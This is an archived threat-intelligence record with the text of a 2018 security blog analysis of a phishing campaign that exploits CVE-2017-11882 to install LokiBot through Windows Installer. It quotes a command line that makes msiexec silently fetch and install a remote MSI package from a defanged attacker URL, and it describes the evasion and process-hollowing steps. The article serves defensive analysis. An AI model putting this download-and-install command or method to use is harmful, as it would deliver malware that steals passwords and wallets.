{
	"id": "7cbcb84f-ba06-4e61-a3f2-268923459f62",
	"created_at": "2026-04-06T00:19:20.416Z",
	"updated_at": "2026-04-10T03:24:24.434203Z",
	"deleted_at": null,
	"sha1_hash": "9e78cab26a45ddae49c630fce09ad4d20fb7aaca",
	"title": "Attack Using Windows Installer Leads to LokiBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 75430,
	"plain_text": "Attack Using Windows Installer Leads to LokiBot\r\nBy: Martin Co, Gilbert Sison Feb 08, 2018 Read time: 4 min (1110 words)\r\nPublished: 2018-02-08 · Archived: 2026-04-05 12:53:34 UTC\r\nBack in November 2017, Microsoft patched CVE-2017-11882, a remote code execution vulnerability that affected Microsoft Office. However, this didn’t prevent cybercrime groups such as Cobalt from exploiting this vulnerability in order to deliver a variety of malware, including FAREIT, Ursnif, and a cracked version of the Loki infostealer, a keylogger that was primarily advertised as capable of stealing passwords and cryptocurrency wallets.\r\nRecently, we discovered CVE-2017-11882 being exploited again in an attack that uses an uncommon method of installation—via the Windows Installer service in Microsoft Windows operating systems. This differs from previous malware that exploited the vulnerability using the Windows executable mshta.exe to run a PowerShell script, which is used to download and execute the payload. This attack uses msiexec.exe as part of the Windows Installer service.\r\nInfection Chain\r\nFigure 1. Infection Chain for the attack\r\nThe samples we analyzed seem to be part of a malware spam campaign. It starts off with an email that asks the recipient to confirm a payment they made to the sender. The email contains text written in Korean, which is roughly translated as “hello, please check if your PC may be infected by virus or malicious codes,” apparently to warn the recipient about possible infections.\r\nThe email also contains an attached document file labeled “Payment copy.Doc” (Detected by Trend Micro as TROJ_CVE201711882.SM) which is supposedly a payment confirmation document. However, the attachment is actually used to exploit CVE-2017-11882.\r\nFigure 2. Spam email containing the document file used to exploit CVE-2017-11882\r\nFigure 3. How the document will appear to the user\r\nThe exploitation of this vulnerability leads to the download and installation of a malicious MSI package labeled zus.msi via Windows Installer through the following command line:\r\nCall cmd.exe /c msiexec /q /I “hxxps[:]//www[.]uwaoma[.]info/zus.msi\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/\r\nPage 1 of 3\n\nFigure 4. msiexec download and installation. msiexec.exe gives the binary the file name MSIFD83.tmp\r\nFigure 5. MSIL binary after installation\r\nOnce downloaded, Windows Installer (msiexec.exe) will proceed to install an MSIL or Delphi binary to the system. Depending on the MSI package downloaded, it may contain either a heavily obfuscated Microsoft Intermediate Language (MSIL) or Delphi binary file, which then acts as a loader for the actual payload.\r\nOne notable aspect of the package is that it provides a compression layer that file scan engines need to process and enumerate in order to detect the file as malicious. While this is relatively simple, being able to detect and identify the actual payload might be more difficult since it is contained in the heavily obfuscated MSIL or Delphi binary.\r\nThe binary launches another randomly named instance of itself. This instance will be hollowed out and replaced with the malware payload.\r\nFigure 6. Hollowed out instance of MSIL debugger view\r\nSo far, we have seen this technique used to deliver a sample we detected as LokiBot (TROJ_LOKI.SMA). However, it is modular enough to deliver other payloads.\r\nFigure 7. The malware sample we identified as a LokiBot variant\r\nWhy does it use a new installation method?\r\nSecurity software has become proficient at monitoring possible downloader processes such as Wscript, PowerShell, Mshta.exe, Winword.exe, and other similar executables that have become increasingly popular methods of installing malicious payloads. Due to their widespread use, it became easy to stop the arrival of threats via these programs. However, the use of msiexec.exe to download a malicious MSI package is not something we typically see in most malware.\r\nWhile other existing malware families use msiexec.exe, such as the Andromeda botnet (Detected by Trend Micro as ANDROM family), the difference is in how this method uses the installer. In Andromeda’s case, code is injected into msiexec.exe to download updates and payloads. Another key difference is that when Andromeda downloads its payloads and updates, it immediately downloads and executes a PE file. This method uses an MSI package that msiexec.exe recognizes as an installation package, thereby using Windows Installer as intended.\r\nMalware has never really needed to install itself through an MSI package. Unlike most malware that uses msiexec.exe, the malware we analyzed does so without modifying the binary or its processes, and uses the available functionality of Windows Installer to install malware. In addition, MSI packages are typically abused for malicious purposes to install Potentially Unwanted Applications (PUA) and not by malware per se. This is a new direction for malware creators.\r\nWhy the use of this specific installation type? We believe it might represent a new evasion mechanism for malware creators to skirt around security software that usually focuses on traditional installation methods. While we did manage to detect samples of the malware payload in limited numbers, we cannot definitively say if these samples are being delivered via the method described. What we can surmise, however, is that the malware creators might be focusing on Korean targets given the language used in the sample email. They could also be testing different ways of delivery — like this new attack method — to determine their effectiveness.\r\nMitigation\r\nGiven the use of phishing emails as the primary method of propagation, both users and organizations can mitigate the impact of this particular attack by implementing best practices designed to combat email-based threats.\r\nContext is very important in this instance. For example, recipients should be suspicious of any email that asks for the confirmation of payment receipts or deliveries for non-existent transactions. Any unusual messages, sentences or phrases should also be a red flag for recipients. Again, in this case, the inclusion of a warning to check for any suspicious software is quite out of place in a supposed payment confirmation email. Communications that involve business transactions are also often highly professional, so any misspellings or grammatical errors, especially if excessive, could signify a phishing attempt.\r\nAnother option that is more specific to this attack would be to disable or restrict Windows Installer itself to prevent potential attackers from installing software on the user’s systems, or set the system to only install programs set up by a system administrator.\r\nTrend Micro Solutions\r\nTrend Micro™ Deep Security™ and TippingPoint provide virtual patching that protects endpoints from threats that abuse unpatched vulnerabilities.\r\nTrend Micro XGen™ security provides a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints. It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads. With capabilities like web/URL filtering, behavioral analysis, and custom sandboxing, XGen™ protects against today’s purpose-built threats that bypass traditional controls and exploit known, unknown, or undisclosed vulnerabilities. Smart, optimized, and connected, XGen™ powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/"
	],
	"report_names": [
		"attack-using-windows-installer-msiexec-exe-leads-lokibot"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434760,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9e78cab26a45ddae49c630fce09ad4d20fb7aaca.pdf",
		"text": "https://archive.orkl.eu/9e78cab26a45ddae49c630fce09ad4d20fb7aaca.txt",
		"img": "https://archive.orkl.eu/9e78cab26a45ddae49c630fce09ad4d20fb7aaca.jpg"
	}
}